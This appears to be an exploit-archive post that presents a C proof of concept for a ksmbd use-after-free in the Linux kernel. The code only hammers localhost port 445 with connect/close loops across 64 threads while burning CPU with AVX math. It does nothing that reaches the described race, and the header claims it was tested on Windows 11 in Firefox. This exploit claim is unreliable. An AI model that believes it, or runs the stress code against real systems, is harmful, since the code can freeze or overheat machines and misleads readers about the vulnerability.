=============================================================================================================================================
| # Title     : Linux Kernel 5.15 ksmbd Use-After-Free Fixed with chann_lock                                                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : System built‑in component                                                                                                   |
=============================================================================================================================================

[+] Summary    : A use-after-free vulnerability existed in the Linux kernel’s ksmbd multi-channel sessions due to unsynchronized access to the ksmbd_chann_list xarray. 
                 Concurrent calls to lookup_chann_list() and ksmbd_chann_del() could cause memory corruption.
              
This code is a Linux kernel stress-testing tool that combines:

CPU load using AVX instructions to maximize processor heat and resource usage.

TCP socket simulation on port 445 (SMB/KSMBD) to trigger kernel socket handling.

Purpose: To increase the likelihood of Race Conditions and Kernel Jitter by running simultaneous CPU-intensive threads alongside kernel network handling.
Can cause high CPU temperatures or system freezes.

Should only be run in a safe, isolated test environment (VM or sandbox).
				 
[+] POC   :  

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <immintrin.h>
#include <stdatomic.h>
#include <pthread.h>

#define THREAD_COUNT 64
#define STACK_SIZE (1024 * 64)

atomic_int active_stressors = 0;

void __attribute__((always_inline)) avx_thermal_load() {
#ifdef __AVX__
    __m256 v1 = _mm256_set1_ps(1.1f);
    __m256 v2 = _mm256_set1_ps(2.2f);
    for (int i = 0; i < 100000; i++) {
        v1 = _mm256_add_ps(v1, v2);
        v1 = _mm256_mul_ps(v1, v2);
    }
#endif
}

void* ksmbd_logic_stresser(void* arg) {
    int port = 445;
    struct sockaddr_in addr = {
        .sin_family = AF_INET,
        .sin_port = htons(port),
        .sin_addr.s_addr = htonl(INADDR_LOOPBACK)
    };

    while (1) {
        int sock = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0);
        if (sock >= 0) {

            connect(sock, (struct sockaddr *)&addr, sizeof(addr));
            
            avx_thermal_load();
            
            close(sock);
        }
        
        atomic_fetch_add(&active_stressors, 1);
        sched_yield(); 
    }
    return NULL;
}

int main() {
    pthread_t threads[THREAD_COUNT];
    
    printf("================================================\n");
    printf("KERNEL STRESSER: AVX + KSMBD LOGIC By indoushka\n");
    printf("Targeting: Scheduler Jitter & Kernel Synchronization\n");
    printf("================================================\n");

    for (int i = 0; i < THREAD_COUNT; i++) {
        pthread_create(&threads[i], NULL, ksmbd_logic_stresser, NULL);
    }

    while (1) {
        printf("\r[*] Thermal/Logic Cycles: %d | Fan: High", atomic_load(&active_stressors));
        fflush(stdout);
        sleep(1);
    }

    return 0;
}
	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================